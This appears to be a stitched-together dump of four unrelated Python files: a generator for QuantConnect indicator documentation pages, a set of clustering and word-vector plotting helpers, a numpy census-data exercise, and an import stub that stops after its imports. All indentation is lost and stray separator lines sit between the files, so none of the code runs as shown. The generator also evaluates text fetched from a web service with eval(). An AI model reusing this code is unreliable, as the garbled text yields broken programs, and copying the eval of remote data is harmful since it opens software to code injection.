ind = urlopen(f"https://www.quantconnect.com/services/inspector?type=T:QuantConnect.Indicators.{item}").read().decode("utf-8") \
.replace("true", "True") \
.replace("false", "False") \
.replace("null", "None")
ind_dict = eval(ind)
detail_description = str(ind_dict['description']).replace("Represents", "This indicator represents")
if "Source: " in detail_description:
link_split = detail_description.split("http")
detail_description = link_split[0].replace("Source: ", f'<sup><a href="https{link_split[1]}">source</a></sup>')
else:
ind = urlopen(f"https://www.quantconnect.com/services/inspector?type=T:QuantConnect.Indicators.CandlestickPatterns.{item}").read().decode("utf-8") \
.replace("true", "True") \
.replace("false", "False") \
.replace("null", "None")
ind_dict = eval(ind)
detail_description = f"Create a new {ind_dict['description']} to indicate the pattern's presence."
descriptions[item] = detail_description
for prop in ind_dict["properties"]:
prop_name = str(prop["property-name"])
if "MovingAverageType" not in prop_name\
and "IsReady" not in prop_name\
and "WarmUpPeriod" not in prop_name\
and "Name" not in prop_name\
and "Period" not in prop_name\
and "Samples" not in prop_name:
plots[item].append(prop_name)
while True:
if "QuantConnect.Indicators.Indicator" in ind_dict["base-type-full-name"]:
updates[item] = (0, tuple(("data[symbol].EndTime", "data[symbol].High")))
update_value[item] = "time/decimal pair"
break
elif "QuantConnect.Indicators.BarIndicator" in ind_dict["base-type-full-name"]:
updates[item] = (1, tuple(("data.QuoteBars[symbol]",)))
update_value[item] = "a <code>TradeBar</code>, <code>QuoteBar</code>, or an <code>IndicatorDataPoint</code>"
break
elif "QuantConnect.Indicators.TradeBarIndicator" in ind_dict["base-type-full-name"]\
or "QuantConnect.Indicators.CandlestickPatterns.CandlestickPattern" in ind_dict["base-type-full-name"]:
updates[item] = (2, tuple(("data.Bars[symbol]",)))
update_value[item] = "a <code>TradeBar</code>"
break
else:
end = ind_dict["base-type-full-name"].split(".")[-1]
ind = urlopen(f"https://www.quantconnect.com/services/inspector?type=T:QuantConnect.Indicators.{end}").read().decode("utf-8") \
.replace("true", "True") \
.replace("false", "False") \
.replace("null", "None")
ind_dict = eval(ind)
i = 0
k = 0
for full, short in dict(sorted(names.items())).items():
name = " ".join(re.findall('[a-zA-Z][^A-Z]*', full))
if full not in candle:
i += 1
base = f"{root}/{i:02} {name}"
source_link = f"https://raw.githubusercontent.com/QuantConnect/Lean/master/Indicators/{'Stochastics' if full == 'Stochastic' else 'Momersion' if full == 'MomersionIndicator' else full}.cs"
else:
k += 1
base = f"{root}/00 Candlestick Pattern/{k:02} {name}"
source_link = f"https://raw.githubusercontent.com/QuantConnect/Lean/master/Indicators/CandlestickPatterns/{full}.cs"
destination_folder = pathlib.Path(base)
destination_folder.mkdir(parents=True, exist_ok=True)
source = urlopen(source_link).read().decode("utf-8")
lines = source.split("\n")
for l in range(len(lines)):
if f"public {full}" in lines[l]:
j = l - 1
temp = {"link": source_link.replace("raw.githubusercontent.com/QuantConnect/Lean", "github.com/QuantConnect/Lean/blob"), "line": l, "summary": "", "args": {}}
if full in full_apis:
temp["param"] = full_apis[full][-1]["param"]
else:
temp["param"] = {}
while "///" in lines[j]:
if "</param>" in lines[j] and "<param name=" in lines[j]:
param = lines[j].split('"')[1]
temp["param"][param] = lines[j].split(">")[1].split("<")[0]
if not temp["param"][param].strip():
temp["param"][param] = "/"
elif temp["param"][param].strip()[-1] != ".":
temp["param"][param] = temp["param"][param].strip() + "."
elif "</summary>" in lines[j]:
temp["summary"] = lines[j-1].split("/// ")[-1].replace('<see cref="', '<code>').replace('"/>', '</code>').replace('" />', '</code>')
if temp["summary"].strip()[-1] != ".":
temp["summary"] = temp["summary"].strip() + "."
j -= 1
try:
constructor_args_ = lines[l].split("(")[1].split(")")[0].split(", ")
constructor_args = []
current = ""
on = True
for num in range(len(constructor_args_)):
if "<" in constructor_args_[num] and ">" not in constructor_args_[num]:
current += constructor_args_[num] + ", "
on = False
elif "<" not in constructor_args_[num] and ">" in constructor_args_[num]:
current += constructor_args_[num]
on = True
else:
current = constructor_args_[num]
on = True
if on:
constructor_args.append(current)
current = ""
except:
constructor_args = None
if not constructor_args:
temp["args"] = {}
else:
for x in [a.split(" ") for a in constructor_args]:
if "=" in x:
ind = x.index("=")
temp["args"][f"*{''.join(x[:(ind-1)])}"] = x[ind - 1]
if x[ind - 1] in temp["args"]:
temp["param"][x[ind - 1]] = f"<span class='qualifier'>(Optional)</span> {temp['param'][x[ind - 1]]} Default: {''.join(x[(ind+1):]).strip()}"
else:
temp["param"][x[ind - 1]] = f"<span class='qualifier'>(Optional)</span> /. Default: {''.join(x[(ind+1):]).strip()}"
elif len(x) == 2:
temp["args"][x[0]] = x[1]
if full in full_apis:
full_apis[full].append(temp)
else:
full_apis[full] = [temp]
with open(destination_folder / "01 Introduction.html", "w", encoding="utf-8") as html_file:
html_file.write(f"""<!-- Code generated by Indicator-Reference-Code-Generator.py -->
<p>{descriptions[full]}</p>""")
api = []
with open("02 Writing Algorithms/98 API Reference/02.html", "r", encoding="utf-8") as fin:
lines = fin.readlines()
active = False
for line in lines:
if active and 'button class="method-tag"' not in line:
api.append(line)
if "</div>" in line and " " not in line:
active = False
if not active and f'<a id="{short}-header"></a>' in line:
active = True
with open(destination_folder / "02 Create Manual Indicators.html", "w", encoding="utf-8") as html_file:
html_file.write(f"""<!-- Code generated by Indicator-Reference-Code-Generator.py -->
<style>
.method-container {{
border: 1px solid #D9E1EB;
border-top: 0;
border-radius: 4px;
margin-top: 2rem;
}}
.method-container > div {{
padding-left: 1.5rem;
padding-right: 1rem;
margin-bottom: 2rem;
}}
.method-details > div {{
margin-bottom: 2rem;
display: block;
}}
.method-header {{
background: #FBFCFD;
border-bottom: 1px solid #D9E1EB;
border-top: 1px solid #D9E1EB;
padding: 1.5rem;
}}
.method-header > pre {{
white-space: pre-line;
}}
.method-header:first-child {{
border-radius: 4px 4px 0px 0px;
}}
.method-order {{
color: #8F9CA3;
font-size: 14px;
margin-left: 0.5rem;
}}
.parameter-table{{
margin: 2rem 0 2rem -0.25rem;
display: block;
overflow-x: auto;
}}
.parameter-table th {{
padding-bottom: 1rem;
text-align: left;
}}
.parameter-table td {{
padding: 1rem 3rem 0 0;
vertical-align: top;
}}
.show-hide-detail {{
background: none;
border: none;
padding: 0;
color: #069;
cursor: pointer;
}}
</style>
<script>
function ShowHide(event, idName) {{
var x = document.getElementById(idName);
if (x.style.display == "none") {{
x.style.display = "block";
event.target.innerHTML = "<span>Hide Details <img src='https://cdn.quantconnect.com/i/tu/api-chevron-hide.svg' alt='arrow-hide'></span>";
}}
else {{
x.style.display = "none";
event.target.innerHTML = "<span>Show Details <img src='https://cdn.quantconnect.com/i/tu/api-chevron-show.svg' alt='arrow-show'></span>";
}}
}};
</script>
<p>{f"You can manually create a <code>{full}</code> indicator, so it doesn’t automatically update." if full not in candle else "A candlestick pattern indicator requires manual creation and update with a <code>TradeBar</code> object."} Manual indicators let you update their values with any data you choose. The following reference table describes the <code>{full}</code> constructor.</p>
<div class="method-container">
""")
for e, code in enumerate(full_apis[full]):
html_file.write(f""" <div class="method-header">
<h3>{full}()<span class="method-order">{e+1}/{len(full_apis[full])}</span></h3>
<pre>
<font color="#8F9CA3">{full}</font> QuantConnect.Indicators.{"CandlestickPatterns." + full if full in candle else full} (
""")
if len(code["args"].items()) > 0:
length = max([len(x) for x in code["args"].keys()]) + 2
for e, (arg_type, arg_name) in enumerate(code["args"].items()):
html_file.write(f"""  <code>{arg_type}</code>{" " * (length - len(arg_type))}{arg_name}{"," if e != len(code["args"])-1 else ""}
""")
html_file.write(f""" )
</pre>
</div>
<div class="method-description">
<p>{code["summary"]}</p>
</div>
<div class="details-btn">
<button class="show-hide-detail" onclick="ShowHide(event, '{full}-{code["line"]}')"><span>Show Details <img src='https://cdn.quantconnect.com/i/tu/api-chevron-show.svg' alt='arrow-show'></span></button>
</div>
<div class="method-details" id="{full}-{code["line"]}" style="display: none;" >
<div class="parameter-list">
<table class="parameter-table">
<th><strong>Parameters</strong></th>
""")
if len(code["args"].items()) == 0:
html_file.write(' <tr><td colspan="3">This constructor does not take any argument.</td></tr>\n')
else:
for arg_type, arg_name in code["args"].items():
html_file.write(f""" <tr><td><code>{arg_type}</code></td>
<td>{arg_name}</td>
<td>{code["param"][arg_name] if arg_name in code["param"] else "<span class='qualifier'>(Optional)</span> /" if "*" in arg_type else "/"}</td></tr>
""")
html_file.write(f""" </table>
</div>
<div class="method-return">
<h4>Return</h4>
<p><code>{full}</code> - The new <code>{full}</code> indicator object.</div>
<div class="method-def">
<p>Definition at <a href="{code['link']}#L{code['line']}">line {code['line']} of file {'/'.join(code['link'].split('/')[-2:])}.</a></p>
</div>
</div>
""")
index_min = np.argmin(np.array([len(full_apis[full][n]["param"].items()) for n in range(len(full_apis[full]))]))
html_file.write("</div>")
with open(destination_folder / "03 Update Manual Indicators.html", "w", encoding="utf-8") as html_file:
html_file.write(f"""<!-- Code generated by Indicator-Reference-Code-Generator.py -->
<p>You can update the indicator automatically or manually.</p>
<h4>Automatic Update</h4>
<p>To register a manual indicator for automatic updates with the security data, call the <code>RegisterIndicator</code> method.</p>
<div class="section-example-container">
<pre class="csharp">{"using QuantConnect.Indicators.CandlestickPatterns;" if full in candle else ""}
private {full} _{short.lower()};
// In Initialize()
_{short.lower()} = new {full}{str(tuple(x for x, y in full_apis[full][index_min]["param"].items() if "Optional" not in y)[::-1]).replace("'", "").replace('"', '').replace(',)', ')')};
_{short.lower()}.Updated += IndicatorUpdateMethod;
RegisterIndicator(symbol, _{short.lower()}, Resolution.Daily);
// In IndicatorUpdateMethod()
if (_{short.lower()}.IsReady)
{{
var indicatorValue = _{short.lower()}.Current.Value;
}}</pre>
<pre class="python">{"from QuantConnect.Indicators.CandlestickPatterns import " + full if full in candle else ""}
# In Initialize()
self.{short.lower()} = {full}{str(tuple(x for x, y in full_apis[full][index_min]["param"].items() if "Optional" not in y)[::-1]).replace("'", "").replace('"', '').replace(',)', ')')}
self.{short.lower()}.Updated += self.IndicatorUpdateMethod
self.RegisterIndicator(symbol, self.{short.lower()}, Resolution.Daily)
# In IndicatorUpdateMethod()
if self.{short.lower()}.IsReady:
indicator_value = self.{short.lower()}.Current.Value</pre>
</div>
<p>To customize the data that automatically updates the indicator, see <a href="https://www.quantconnect.com/docs/v2/writing-algorithms/consolidating-data/updating-indicators#03-Custom-Indicator-Periods">Custom Indicator Periods</a> and <a href="https://www.quantconnect.com/docs/v2/writing-algorithms/consolidating-data/updating-indicators#04-Custom-Indicator-Values">Custom Indicator Values</a>.</p>
<h4>Manual Update</h4>
<p>Updating your indicator manually enables you to control when the indicator is updated and what data you use to update it. To manually update the indicator, call the <code>Update</code> method with {update_value[full]}. The indicator will only be ready after you prime it with enough data.</p>
<div class="section-example-container">
<pre class="csharp">{"using QuantConnect.Indicators.CandlestickPatterns;" if full in candle else ""}
private {full} _{short.lower()};
{'private Symbol symbol;' if 'symbol' in args[full] else 'private List<Symbol> symbols;' if 'symbols' in args[full] else ''}
// In Initialize()
_{short.lower()} = new {full}{str(tuple(x for x, y in full_apis[full][index_min]["param"].items() if "Optional" not in y)[::-1]).replace("'", "").replace('"', '').replace(',)', ')').replace('name, ', '').replace('name', '')};
{'symbol = AddEquity("SPY").Symbol;' if 'symbol' in args[full] else 'symbols = new List<Symbol> {AddEquity("SPY").Symbol, AddEquity("QQQ").Symbol};' if 'symbols' in args[full] else ''}
// In OnData()
if ({"data" if updates[full][0] == 0 else "data.QuoteBars" if updates[full][0] == 1 else "data.Bars"}.ContainsKey(_symbol))
{{
_{short.lower()}.Update{str(updates[full][1]).replace("'", "").replace('"', '').replace(',)', ')')};
}}
if (_{short.lower()}.IsReady)
{{
var indicatorValue = _{short.lower()}.Current.Value;
}}</pre>
<pre class="python">{"from QuantConnect.Indicators.CandlestickPatterns import " + full if full in candle else ""}
# In Initialize()
self.{short.lower()} = {full}{str(tuple(x for x, y in full_apis[full][index_min]["param"].items() if "Optional" not in y)[::-1]).replace("'", "").replace('"', '').replace(',)', ')').replace('name, ', '').replace('name', '')}
{'self.symbol = self.AddEquity("SPY").Symbol' if 'symbol' in args[full] else 'self.symbols = [self.AddEquity("SPY").Symbol, self.AddEquity("QQQ").Symbol]' if 'symbols' in args[full] else ''}
# In OnData()
if {"data" if updates[full][0] == 0 else "data.QuoteBars" if updates[full][0] == 1 else "data.Bars"}.ContainsKey(self.symbol):
self.{short.lower()}.Update{str(updates[full][1]).replace("'", "").replace('"', '').replace(',)', ')').replace("symbol", "self.symbol")}
if self.{short.lower()}.IsReady:
indicator_value = self.{short.lower()}.Current.Value</pre>
</div>""")
if full not in candle:
with open(destination_folder / "04 Create Automatic Indicators.html", "w", encoding="utf-8") as html_file:
html_file.write(f"""<!-- Code generated by Indicator-Reference-Code-Generator.py -->
<style>
.method-container {{
border: 1px solid #D9E1EB;
border-top: 0;
border-radius: 4px;
margin-top: 2rem;
}}
.method-container > div {{
padding-left: 1.5rem;
padding-right: 1rem;
margin-bottom: 2rem;
}}
.method-details > div {{
margin-bottom: 2rem;
display: block;
}}
.method-header {{
background: #FBFCFD;
border-bottom: 1px solid #D9E1EB;
border-top: 1px solid #D9E1EB;
padding: 1.5rem;
}}
.method-header > pre {{
white-space: pre-line;
}}
.method-header:first-child {{
border-radius: 4px 4px 0px 0px;
}}
.method-order {{
color: #8F9CA3;
font-size: 14px;
margin-left: 0.5rem;
}}
.parameter-table{{
margin: 2rem 0 2rem -0.25rem;
display: block;
overflow-x: auto;
}}
.parameter-table th {{
padding-bottom: 1rem;
text-align: left;
}}
.parameter-table td {{
padding: 1rem 3rem 0 0;
vertical-align: top;
}}
.show-hide-detail {{
background: none;
border: none;
padding: 0;
color: #069;
cursor: pointer;
}}
</style>
<script>
function ShowHide(event, idName) {{
var x = document.getElementById(idName);
if (x.style.display == "none") {{
x.style.display = "block";
event.target.innerHTML = "<span>Hide Details <img src='https://cdn.quantconnect.com/i/tu/api-chevron-hide.svg' alt='arrow-hide'></span>";
}}
else {{
x.style.display = "none";
event.target.innerHTML = "<span>Show Details <img src='https://cdn.quantconnect.com/i/tu/api-chevron-show.svg' alt='arrow-show'></span>";
}}
}};
</script>
<p>The {short} method creates an {full} indicator, sets up a consolidator to update the indicator, and then returns the indicator so you can use it in your algorithm.</p>
<p>The following reference table describes the <code>{short}</code> method:</p>
{"".join(api)}
<br/>
<p>If you don't provide a resolution, it defauls to the security resolution. If you provide a resolution, it must be greater than or equal to the resolution of the security. For instance, if you subscribe to hourly data for a security, you should update its indicator with data that spans 1 hour or longer.</p>
<p>For more information about the selector argument, see <a href="https://www.quantconnect.com/docs/v2/writing-algorithms/indicators/automatic-indicators#07-Alternative-Price-Fields">Alternative Price Fields</a>.</p>""")
with open(destination_folder / "05 Get Indicator Values.html", "w", encoding="utf-8") as html_file:
html_file.write(f"""<!-- Code generated by Indicator-Reference-Code-Generator.py -->
<p>To get the value of the indicator, use its <code>Current.Value</code> attribute.</p>
<div class="section-example-container">
<pre class="csharp">private {full} _{short.lower()};
// In Initialize()
{'var symbol = AddEquity("SPY").Symbol;' if 'symbol' in args[full] else 'var symbols = new[] {AddEquity("SPY").Symbol, AddEquity("QQQ").Symbol};' if 'symbols' in args[full] else ''}
_{short.lower()} = {short}{str(args[full]).replace("'", "").replace('"', '').replace(',)', ')').replace('name, ', '').replace('name', '')};
// In OnData()
if (_{short.lower()}.IsReady)
{{
""")
for x in plots[full]:
html_file.write(f''' var {x[0].lower()+x[1:]} = _{short.lower()}.{x}.Value;
''')
html_file.write(f"""}}</pre>
<pre class="python"># In Initialize()
{'symbol = self.AddEquity("SPY").Symbol' if 'symbol' in args[full] else 'symbols = [self.AddEquity("SPY").Symbol, self.AddEquity("QQQ").Symbol]' if 'symbols' in args[full] else ''}
self.{short.lower()} = self.{short}{str(args[full]).replace("'", "").replace('"', '').replace(',)', ')').replace('name, ', '').replace('name', '')}
# In OnData()
if self.{short.lower()}.IsReady:
""")
for x in plots[full]:
html_file.write(f''' {"_".join([y.lower() for y in re.findall('[A-Z][^A-Z]*', x) if y])} = self.{short.lower()}.{x}.Value
''')
html_file.write(f"""</pre>
</div>""")
image_file = f"Resources/indicators/plots/indicator-reference-{short if full != 'IntradayVwap' else 'IntradayVwap'}.png"
if os.path.isfile(image_file):
with open(destination_folder / "06 Visualization.html", "w", encoding="utf-8") as html_file:
html_file.write(f"""<!-- Code generated by Indicator-Reference-Code-Generator.py -->
<p>To plot indicator values, in the <code>OnData</code> event handler, call the <code>Plot</code> method.</p>
<div class="section-example-container">
<pre class="csharp">private {full} _{short.lower()};
// In Initialize()
{'var symbol = AddEquity("SPY").Symbol;' if 'symbol' in args[full] else 'var symbols = new[] {AddEquity("SPY").Symbol, AddEquity("QQQ").Symbol};' if 'symbols' in args[full] else ''}
_{short.lower()} = {short}{str(args[full]).replace("'", "").replace('"', '').replace(',)', ')').replace('name, ', '').replace('name', '')};
// In OnData()
if (_{short.lower()}.IsReady)
{{
""")
for x in plots[full]:
html_file.write(f''' Plot("My Indicators", "{x.lower() if x != "Current" else full.lower()}", _{short.lower()}.{x});
''')
html_file.write(f"""}}</pre>
<pre class="python"># In Initialize()
{'symbol = self.AddEquity("SPY").Symbol' if 'symbol' in args[full] else 'symbols = [self.AddEquity("SPY").Symbol, self.AddEquity("QQQ").Symbol]' if 'symbols' in args[full] else ''}
self.{short.lower()} = self.{short}{str(args[full]).replace("'", "").replace('"', '').replace(',)', ')').replace('name, ', '').replace('name', '')}
# In OnData()
if self.{short.lower()}.IsReady:
""")
for x in plots[full]:
html_file.write(f''' self.Plot("My Indicators", "{x.lower() if x != "Current" else full.lower()}", self.{short.lower()}.{x})
''')
with open(image_file, "rb") as image_file:
encoded_string = base64.b64encode(image_file.read())
html_file.write(f"""</pre>
</div>
<img class="docs-image" src="data:image/png;base64,{encoded_string.decode('utf-8')}">
<p>For more information about plotting indicators, see <a href="https://www.quantconnect.com/docs/v2/writing-algorithms/indicators/plotting-indicators">Plotting Indicators</a>.</p>""")
else:
print(f"Image is not found for {short}, no visualization page is generated.")
with open("Resources/indicators/indicator_count.html", "w", encoding="utf-8") as html_file:
html_file.write(f"There are {i} indicators.")
with open("Resources/indicators/candlestick_pattern_count.html", "w", encoding="utf-8") as html_file:
html_file.write(f"There are {k} candlestick pattern indicators.")
|
python
|
import matplotlib.patches as mpatches
import matplotlib.pyplot as plt
import matplotlib.cm as cm
import seaborn as sns
import pandas as pd
import numpy as np
import math
import os
from scipy.cluster.hierarchy import dendrogram
from sklearn.decomposition import PCA
from sklearn.manifold import TSNE
import umap
from matplotlib import rcParams
from wordcloud import WordCloud
import random
sns.set()
cmap = cm.get_cmap("viridis")
rcParams['font.family'] = 'sans-serif'
rcParams['font.sans-serif'] = ['Ubuntu']
def word_cloud(corpus):
text = ""
for document, _ in corpus:
text += " ".join(document)
# Circle mask
x, y = np.ogrid[:300, :300]
mask = (x - 150) ** 2 + (y - 150) ** 2 > 130 ** 2
mask = 255 * mask.astype(int)
return WordCloud(scale=10,
mask=mask,
colormap=cmap,
background_color='white',
min_font_size=8).generate(text)
def scatter_plot_2d(x, labels):
fig, ax = plt.subplots()
fig.set_size_inches(12, 7)
df = pd.DataFrame(x, columns=['x', 'y'])
df['label'] = labels
for idx, label in enumerate(set(labels)):
ax.scatter(df[df['label'] == label]["x"],
df[df['label'] == label]["y"],
label=label,
s=30, lw=0, alpha=0.7)
ax.legend()
return fig, ax
def scatter_plot_3d(x, labels):
fig, ax = plt.subplots(subplot_kw={"projection": '3d'})
fig.set_size_inches(12, 7)
df = pd.DataFrame(x, columns=['x', 'y', 'z'])
df['label'] = labels
for idx, label in enumerate(set(labels)):
ax.scatter(
xs=df[df['label'] == label]["x"],
ys=df[df['label'] == label]["y"],
zs=df[df['label'] == label]["z"],
label=label,
)
ax.legend()
return fig, ax
def scatter_plot(x, labels, dimension):
if dimension == 2:
return scatter_plot_2d(x, labels)
if dimension == 3:
return scatter_plot_3d(x, labels)
def umap_word_visualize(docs, labels, dimension):
reducer = umap.UMAP(random_state=42, n_components=dimension)
X = reducer.fit_transform(docs)
return scatter_plot(X, labels, dimension)
def t_sne_word_visualize(docs, labels, dimension):
reducer = TSNE(random_state=42, n_components=dimension,
perplexity=40, n_iter=400)
X = reducer.fit_transform(docs)
return scatter_plot(X, labels, dimension)
def pca_word_visualizer(docs, labels, dimension):
reducer = PCA(n_components=dimension)
X = reducer.fit_transform(docs.toarray())
return scatter_plot(X, labels, dimension)
def kmeans_visualizer(docs, docs_labels, docs_clusters, centers, title):
fig, ax = plt.subplots()
fig.set_size_inches(12, 7)
reducer = PCA(n_components=2)
X = reducer.fit_transform(docs.toarray())
centroids = reducer.transform(centers)
df = pd.DataFrame(X, columns=['x', 'y'])
df['label'] = docs_labels
for idx, cluster in enumerate(docs_clusters):
ax.plot(
[centroids[cluster, 0], X[idx, 0]], [
centroids[cluster, 1], X[idx, 1]],
linestyle='-', color="#444444", linewidth=1, alpha=0.2, zorder=2)
for idx, label in enumerate(set(docs_labels)):
values = df[df['label'] == label]
ax.scatter(values["x"], values["y"], marker=".", label=label, zorder=1)
ax.scatter(centroids[:, 0], centroids[:, 1],
marker='o', c="w", alpha=1, s=200, zorder=3)
for idx in range(len(centroids)):
ax.scatter(centroids[idx, 0], centroids[idx, 1], color="k",
marker="$%d$" % idx, zorder=4)
ax.legend()
ax.set_title(title)
return fig, ax
def silhouette_plot(y, n_clusters, silhouette_avg, sample_silhouette_values, ax):
y_lower = 10
ax.set_ylim([0, len(y) + (n_clusters + 1) * 10])
ax.set_xlim([-0.1, 1])
for cluster in range(n_clusters):
ith_cluster_silhouette_values = sample_silhouette_values[y == cluster]
ith_cluster_silhouette_values.sort()
size_cluster_i = ith_cluster_silhouette_values.shape[0]
y_upper = y_lower + size_cluster_i
color = cmap(float(cluster) / n_clusters)
ax.fill_betweenx(
np.arange(y_lower, y_upper), 0,
ith_cluster_silhouette_values,
facecolor=color,
edgecolor=color,
alpha=0.7)
ax.text(-0.15, y_lower + 0.5 * size_cluster_i, str(cluster))
y_lower = y_upper + 10
ax.axvline(x=silhouette_avg, color="red", linestyle="-", alpha=0.8)
ax.set_yticks([])
return ax
def cluster_plot(x, y, centers, ax=None):
colors = cmap(y.astype(float) / len(centers))
ax.scatter(x[:, 0], x[:, 1], marker='.', s=30,
lw=0, alpha=0.7, c=colors, edgecolor='k')
ax.scatter(centers[:, 0], centers[:, 1],
marker='D', c="w", alpha=1, s=200)
for i, c in enumerate(centers):
ax.scatter(c[0], c[1], marker='$%d$' %
i, alpha=1, s=50, edgecolor='k')
return ax
def cluster_docs_plot(docs, y, centers):
reducer = PCA(n_components=2)
X = reducer.fit_transform(docs.toarray())
centroids = reducer.transform(centers)
fig, ax = plt.subplots()
fig.set_size_inches(12, 7)
ax = cluster_plot(X, y, centroids, ax)
return fig, ax
def silhouette_cluster_plot(docs, y, centers, n_clusters, silhouette_avg, sample_silhouette_values):
reducer = PCA(n_components=2)
X = reducer.fit_transform(docs.toarray())
centroids = reducer.transform(centers)
fig, (ax1, ax2) = plt.subplots(1, 2)
fig.set_size_inches(15, 10)
silhouette_plot(y, n_clusters, silhouette_avg,
sample_silhouette_values, ax1)
cluster_plot(X, y, centroids, ax2)
return fig, (ax1, ax2)
def satter_graph_metrics(points, clusters, title, color=1, contrast=[], y_label="", x_label=""):
fig, ax = plt.subplots()
fig.set_size_inches(15, 10)
ax.plot(clusters, points, linestyle="-",
color=cmap(color), marker="o", zorder=1)
if len(contrast) > 0:
ax.scatter([clusters[i] for i in contrast], [points[i]
for i in contrast], marker="o", color="r", s=120, zorder=2)
ax.axvline(x=[clusters[i] for i in contrast], color="r",
linestyle="-", alpha=0.8, zorder=3)
ax.set_title(title)
ax.set_xticks(clusters)
ax.set_ylabel(y_label)
ax.set_xlabel(x_label)
return fig, ax
def plot_dendrogram(model, y):
fig, (ax1, ax2) = plt.subplots(
nrows=2, ncols=1, sharex=False, sharey=False,
gridspec_kw={'height_ratios': [5, 1], 'hspace': 0.002})
fig.set_size_inches(25, 10)
counts = np.zeros(model.children_.shape[0])
n_samples = len(model.labels_)
for i, merge in enumerate(model.children_):
current_count = 0
for child_idx in merge:
if child_idx < n_samples:
current_count += 1 # leaf node
else:
current_count += counts[child_idx - n_samples]
counts[i] = current_count
linkage_matrix = np.column_stack(
[model.children_, model.distances_, counts]).astype(float)
colormap = {label: cmap(idx / len(set(y)))
for idx, label in enumerate(set(y))}
ddata = dendrogram(linkage_matrix, labels=y, no_labels=True, ax=ax1)
colors = [colormap[label] for label in ddata['ivl']]
ax2.bar([idx for idx, _ in enumerate(y)], [
1 for _ in range(len(y))], color=colors, edgecolor=colors)
ax2.set_xlim(-0.5, len(y)-.5)
ax2.set_yticks([])
ax2.set_xticks([])
ax2.legend(handles=[mpatches.Patch(color=b, label=a) for a, b in colormap.items()],
bbox_to_anchor=(0.5, -0.5), loc='lower center', ncol=len(colormap.values()))
return fig, (ax1, ax2)
def plot_confusion_matrix(cm, y_true, title):
fig, ax = plt.subplots()
fig.set_size_inches(15, 10)
df_cm = pd.DataFrame(cm, columns=np.unique(
y_true), index=np.unique(y_true))
df_cm.index.name = 'Real'
df_cm.columns.name = 'Previsto'
sns.heatmap(df_cm, cmap=cmap, annot=True, ax=ax)
ax.tick_params(labelrotation=0)
ax.set_title(title)
return fig, ax
def plot_compare_bar(y1, y2, labels, title="", ylabel="Polaridade"):
fig, ax = plt.subplots()
fig.set_size_inches(15, 10)
x = np.arange(len(labels))
width = 0.35
category_colors = cmap(np.linspace(0.15, 0.85, 2 ))
rects1 = ax.bar(x - width/2, y1[1], width, label=y1[0], color=category_colors[0])
rects2 = ax.bar(x + width/2, y2[1], width, label=y2[0], color=category_colors[1])
ax.set_ylabel(ylabel)
ax.set_title(title)
ax.set_xticks(x)
ax.set_xticklabels(labels)
ax.legend()
def autolabel(rects):
for rect in rects:
height = rect.get_height()
ax.annotate('{}'.format(height),
xy=(rect.get_x() + rect.get_width() / 2, height),
xytext=(0, 3), # 3 points vertical offset
textcoords="offset points",
ha='center', va='bottom')
autolabel(rects1)
autolabel(rects2)
return fig, ax
def compare_survey(results, category_names, title):
labels = list(results.keys())
data = np.array(list(results.values()))
data_cum = data.cumsum(axis=1)
category_colors = cmap(np.linspace(0.15, 0.85, data.shape[1]))
fig, ax = plt.subplots()
fig.set_size_inches(15, 10)
ax.invert_yaxis()
ax.xaxis.set_visible(False)
ax.set_xlim(0, np.sum(data, axis=1).max())
for i, (colname, color) in enumerate(zip(category_names, category_colors)):
widths = data[:, i]
starts = data_cum[:, i] - widths
ax.barh(labels, widths, left=starts, height=0.5,
label=colname, color=color, linewidth=0)
xcenters = starts + widths / 2
r, g, b, _ = color
text_color = 'white' if r * g * b < 0.5 else 'darkgrey'
for y, (x, c) in enumerate(zip(xcenters, widths)):
ax.text(x, y, str(int(c)), ha='center', va='center',
color=text_color)
ax.legend(ncol=len(category_names), bbox_to_anchor=(0, 1),
loc='lower left', fontsize='small')
ax.set_title(title)
return fig, ax
def coeherence_score(range_start, range_end, step, coherence_scores, title):
fig, ax = plt.subplots()
fig.set_size_inches(15, 10)
x_ax = range(range_start, range_end, step)
y_ax = coherence_scores
ax.plot(x_ax, y_ax, c='r')
ax.axhline(y=sum(coherence_scores)/len(coherence_scores),
c='k', linestyle='--', linewidth=2)
ax.set_xlabel('Numero de topicos')
ax.set_ylabel('Coerência')
ax.set_title(title)
return fig, ax
def reduce_dimensions_word2vec(model):
num_dimensions = 2 # final num dimensions (2D, 3D, etc)
# extract the words & their vectors, as numpy arrays
vectors = np.asarray(model.wv.vectors)
labels = np.asarray(model.wv.index_to_key) # fixed-width numpy strings
# reduce using t-SNE
tsne = TSNE(n_components=num_dimensions, random_state=0)
vectors = tsne.fit_transform(vectors)
x_vals = [v[0] for v in vectors]
y_vals = [v[1] for v in vectors]
return x_vals, y_vals, labels
def plot_word2vec_with_matplotlib(x_vals, y_vals, labels, title):
random.seed(0)
fig, ax = plt.subplots()
fig.set_size_inches(12, 12)
ax.scatter(x_vals, y_vals)
indices = list(range(len(labels)))
selected_indices = random.sample(indices, 25)
for i in selected_indices:
ax.annotate(labels[i], (x_vals[i], y_vals[i]))
ax.set_title(title)
return fig, ax
|
python
|
# --------------
# Importing header files
import numpy as np
# Path of the file has been stored in variable called 'path'
#data_file='file.csv' # path for the file
data=np.genfromtxt(path, delimiter=",", skip_header=1)
#print("\nData: \n\n", data)
#print("\nType of data: \n\n", type(data))
#New record
new_record=[[50, 9, 4, 1, 0, 0, 40, 0]]
census=np.concatenate((data,new_record))
#Code starts here
# --------------
#Code starts here
age=census[:,0]
max_age=age.max()
min_age=age.min()
age_mean=np.mean(age)
age_std=np.std(age)
print(age,min_age,max_age,age_mean,age_std)
# --------------
#Code starts here
race_0=census[census[:,2]==0]
race_1=census[census[:,2]==1]
race_2=census[census[:,2]==2]
race_3=census[census[:,2]==3]
race_4=census[census[:,2]==4]
l=[]
len_0=len(race_0)
len_1=len(race_1)
len_2=len(race_2)
len_3=len(race_3)
len_4=len(race_4)
l.append(len_0)
l.append(len_1)
l.append(len_2)
l.append(len_3)
l.append(len_4)
#print(l)
minority_race=l.index(min(l))
print(minority_race)
# --------------
#Code starts here
senior_citizens=census[census[:,0]>60]
working_hours_sum=np.sum(senior_citizens[:,6],axis=0)
senior_citizens_len=len(senior_citizens)
avg_working_hours=working_hours_sum/senior_citizens_len
print(avg_working_hours)
# --------------
#Code starts here
high=census[census[:,1]>10]
low=census[census[:,1]<=10]
avg_pay_high=round(high[:,7].mean(axis=0),2)
avg_pay_low=round(low[:,7].mean(axis=0),2)
print(avg_pay_high,avg_pay_low)
|
python
|
# -*- coding: utf-8 -*-
import pandas as pd
import requests
from zvdata.api import df_to_db
from zvdata.recorder import Recorder
